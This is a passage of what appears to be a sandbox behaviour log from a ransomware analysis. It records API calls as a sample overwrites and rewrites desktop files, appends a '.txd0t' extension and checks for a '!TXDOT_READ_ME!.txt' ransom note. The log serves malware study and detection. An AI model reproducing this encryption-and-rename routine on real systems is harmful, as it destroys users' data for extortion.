returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" [0072.705] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg") returned="7SFq.jpg" [0072.705] StrCpyW (in: psz1=0xe9d420, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.705] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.705] GetProcessHeap () returned 0xe30000 [0072.705] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d3e8 | out: hHeap=0xe30000) returned 1 [0072.705] CloseHandle (hObject=0x460) returned 1 [0072.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\7sfq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\7sfq.jpg.txd0t")) returned 1 [0072.707] SetEvent (hEvent=0x3f8) returned 1 [0072.707] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.709] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" [0072.709] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t" [0072.709] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t") returned 0 [0072.709] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt", dwFileAttributes=0x80) returned 1 [0072.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\8dokye-qp.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.710] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=12025) returned 1 [0072.710] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.710] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.710] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffcf07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.710] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x2ef0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x2ef0, lpOverlapped=0x0) returned 1 [0072.711] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffd110, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.711] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x2ef0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x2ef0, lpOverlapped=0x0) returned 1 [0072.711] FlushFileBuffers (hFile=0x460) returned 1 [0072.713] GetProcessHeap () returned 0xe30000 [0072.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecf7b0 [0072.713] StrCpyW (in: psz1=0xecf7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" [0072.713] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt") returned="8dOKYe-qP.odt" [0072.713] StrCpyW (in: psz1=0xecf7e8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.713] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.713] GetProcessHeap () returned 0xe30000 [0072.713] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf7b0 | out: hHeap=0xe30000) returned 1 [0072.713] CloseHandle (hObject=0x460) returned 1 [0072.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\8dokye-qp.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\8dokye-qp.odt.txd0t")) returned 1 [0072.715] SetEvent (hEvent=0x3f8) returned 1 [0072.715] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.716] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" [0072.716] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t" [0072.716] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t") returned 0 [0072.716] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf", dwFileAttributes=0x80) returned 1 [0072.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\aqqls_nj46ayt-l-zj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.717] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=83715) returned 1 [0072.717] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.717] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.717] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb6fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.717] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14700, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x14700, lpOverlapped=0x0) returned 1 [0072.719] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb900, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.719] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14700, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x14700, lpOverlapped=0x0) returned 1 [0072.719] FlushFileBuffers (hFile=0x460) returned 1 [0072.727] GetProcessHeap () returned 0xe30000 [0072.727] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2be8 [0072.727] StrCpyW (in: psz1=0xed2be8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" [0072.727] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf") returned="aqQlS_nJ46AyT-L-zj.swf" [0072.727] StrCpyW (in: psz1=0xed2c20, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.727] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.728] GetProcessHeap () returned 0xe30000 [0072.728] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2be8 | out: hHeap=0xe30000) returned 1 [0072.728] CloseHandle (hObject=0x460) returned 1 [0072.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\aqqls_nj46ayt-l-zj.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\aqqls_nj46ayt-l-zj.swf.txd0t")) returned 1 [0072.730] SetEvent (hEvent=0x3f8) returned 1 [0072.730] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.739] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" [0072.739] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t" [0072.739] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t") returned 0 [0072.739] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg", dwFileAttributes=0x80) returned 1 [0072.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\cb9dbpmz2 zizd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.740] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=21332) returned 1 [0072.740] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.740] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.740] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffaaac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.740] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x5350, lpOverlapped=0x0) returned 1 [0072.741] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffacb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.741] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x5350, lpOverlapped=0x0) returned 1 [0072.741] FlushFileBuffers (hFile=0x460) returned 1 [0072.743] GetProcessHeap () returned 0xe30000 [0072.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0072.743] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" [0072.743] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg") returned="Cb9DBpMZ2 ZiZd.jpg" [0072.743] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.743] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.743] GetProcessHeap () returned 0xe30000 [0072.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.743] CloseHandle (hObject=0x460) returned 1 [0072.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\cb9dbpmz2 zizd.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\cb9dbpmz2 zizd.jpg.txd0t")) returned 1 [0072.745] SetEvent (hEvent=0x3f8) returned 1 [0072.745] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.746] StrCpyW (in: psz1=0x37ff4a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" [0072.746] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t" [0072.746] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t") returned 0 [0072.746] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp", dwFileAttributes=0x80) returned 1 [0072.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\cyly.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.747] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=52063) returned 1 [0072.747] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.747] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.747] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff32a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.747] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xcb50, lpNumberOfBytesRead=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff460*=0xcb50, lpOverlapped=0x0) returned 1 [0072.749] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff34b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.749] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xcb50, lpNumberOfBytesWritten=0x37ff464, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff464*=0xcb50, lpOverlapped=0x0) returned 1 [0072.749] FlushFileBuffers (hFile=0x460) returned 1 [0072.752] GetProcessHeap () returned 0xe30000 [0072.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf0) returned 0xe9c658 [0072.752] StrCpyW (in: psz1=0xe9c658, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" [0072.752] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp") returned="CyLY.bmp" [0072.752] StrCpyW (in: psz1=0xe9c690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.752] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.752] GetProcessHeap () returned 0xe30000 [0072.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9c658 | out: hHeap=0xe30000) returned 1 [0072.752] CloseHandle (hObject=0x460) returned 1 [0072.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\cyly.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\cyly.bmp.txd0t")) returned 1 [0072.755] SetEvent (hEvent=0x3f8) returned 1 [0072.755] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.756] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" [0072.756] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t" [0072.757] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t") returned 0 [0072.757] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls", dwFileAttributes=0x80) returned 1 [0072.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\de3scvajpxnclce34.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.757] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=18402) returned 1 [0072.757] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.757] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.758] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb61e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.758] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x47e0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x47e0, lpOverlapped=0x0) returned 1 [0072.759] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb820, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.759] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x47e0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x47e0, lpOverlapped=0x0) returned 1 [0072.759] FlushFileBuffers (hFile=0x460) returned 1 [0072.761] GetProcessHeap () returned 0xe30000 [0072.761] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed28a0 [0072.761] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" [0072.761] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls") returned="DE3scvajpXnclcE34.xls" [0072.761] StrCpyW (in: psz1=0xed28d8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.761] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.761] GetProcessHeap () returned 0xe30000 [0072.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0072.761] CloseHandle (hObject=0x460) returned 1 [0072.763] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\de3scvajpxnclce34.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\de3scvajpxnclce34.xls.txd0t")) returned 1 [0072.763] SetEvent (hEvent=0x3f8) returned 1 [0072.763] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.765] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" [0072.765] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t" [0072.765] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t") returned 0 [0072.765] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi", dwFileAttributes=0x80) returned 1 [0072.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ghzr_0qe96rjj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.765] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=5294) returned 1 [0072.765] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.765] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.765] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe952, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.766] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14a0, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x14a0, lpOverlapped=0x0) returned 1 [0072.766] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffeb60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.766] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x14a0, lpOverlapped=0x0) returned 1 [0072.766] FlushFileBuffers (hFile=0x460) returned 1 [0072.768] GetProcessHeap () returned 0xe30000 [0072.768] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0072.768] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi" [0072.768] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi") returned="GHZr_0qE96Rjj.avi" [0072.768] StrCpyW (in: 